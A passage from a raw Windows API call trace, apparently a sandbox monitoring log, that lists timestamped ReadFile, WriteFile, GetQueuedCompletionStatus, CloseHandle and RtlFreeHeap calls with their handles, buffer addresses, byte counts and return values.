dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0136.774] CloseHandle (hObject=0x614) returned 1 [0136.884] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0136.884] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.517] ReadFile (in: hFile=0x628, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0147.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.517] ReadFile (in: hFile=0x618, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4280020) returned 1 [0147.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.517] ReadFile (in: hFile=0x624, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 1 [0147.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.517] WriteFile (in: hFile=0x628, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0147.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.517] WriteFile (in: hFile=0x618, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020) returned 1 [0147.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.518] WriteFile (in: hFile=0x624, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020) returned 1 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.518] ReadFile (in: hFile=0x628, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.518] ReadFile (in: hFile=0x618, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4280020) returned 0x0 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.518] ReadFile (in: hFile=0x624, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 0x0 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0147.518] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0147.518] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0147.518] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.518] WriteFile (in: hFile=0x628, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0147.518] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.518] WriteFile (in: hFile=0x618, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020) returned 1 [0147.519] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.519] WriteFile (in: hFile=0x624, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020) returned 1 [0147.519] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.519] CloseHandle (hObject=0x628) returned 1 [0147.520] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0147.520] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.520] CloseHandle (hObject=0x618) returned 1 [0147.521] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0147.521] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.521] CloseHandle (hObject=0x624) returned 1 [0147.522] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0147.522] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.688] ReadFile (in: hFile=0x634, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0147.689] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.689] ReadFile (in: hFile=0x644, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 1 [0147.689] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.689] ReadFile (in: hFile=0x618, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x48b0020) returned 1 [0147.689] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.689] ReadFile (in: hFile=0x640, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x49d0020) returned 1 [0147.690] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.690] WriteFile (in: hFile=0x634, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0xed57, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0147.713] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.713] WriteFile (in: hFile=0x640, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x1328f, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x49d0020) returned 1 [0147.722] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.722] WriteFile (in: hFile=0x644, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020) returned 1 [0147.731] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.731] CloseHandle (hObject=0x634) returned 1 [0147.752] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0147.753] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0147.753] CloseHandle (hObject=0x648) returned 1 [0147.760] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0147.761] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0148.006] WriteFile (in: hFile=0x660, lpBuffer=0x4670124, nNumberOfBytesToWrite=0x12acc, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 0x0 [0148.010] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0148.015] WriteFile (in: hFile=0x660, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 1 [0148.023] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0148.026] CloseHandle (hObject=0x660) returned 1 [0148.056] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0148.056] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.058] ReadFile (in: hFile=0x66c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0149.059] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.059] WriteFile (in: hFile=0x66c, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x15f02, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0149.062] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.062] ReadFile (in: hFile=0x66c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0149.062] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.062] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0149.062] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.063] WriteFile (in: hFile=0x66c, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0149.065] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.065] CloseHandle (hObject=0x66c) returned 1 [0149.072] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0149.072] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.120] ReadFile (in: hFile=0x630, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0149.120] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.120] WriteFile (in: hFile=0x630, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x14335, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0149.121] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.121] ReadFile (in: hFile=0x630, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0149.121] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.121] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0149.121] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.121] WriteFile (in: hFile=0x630, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0149.121] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.121] CloseHandle (hObject=0x630) returned 1 [0149.122] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0149.123] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.872] ReadFile (in: hFile=0x634, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x41f0020) returned 1 [0149.873] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.873] ReadFile (in: hFile=0x13c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4670020) returned 1 [0149.873] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.873] ReadFile (in: hFile=0x650, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4790020) returned 1 [0149.873] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.873] ReadFile (in: hFile=0x64c, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x48b0020) returned 1 [0149.874] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.874] ReadFile (in: hFile=0x624, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x49d0020) returned 1 [0149.874] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.874] ReadFile (in: hFile=0x654, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4af0020) returned 1 [0149.875] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.875] ReadFile (in: hFile=0x660, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4c10020) returned 1 [0149.875] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.875] ReadFile (in: hFile=0x138, lpBuffer=0x4d30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4d30020) returned 1 [0149.875] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.876] ReadFile (in: hFile=0x63c, lpBuffer=0x4e50124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124*, 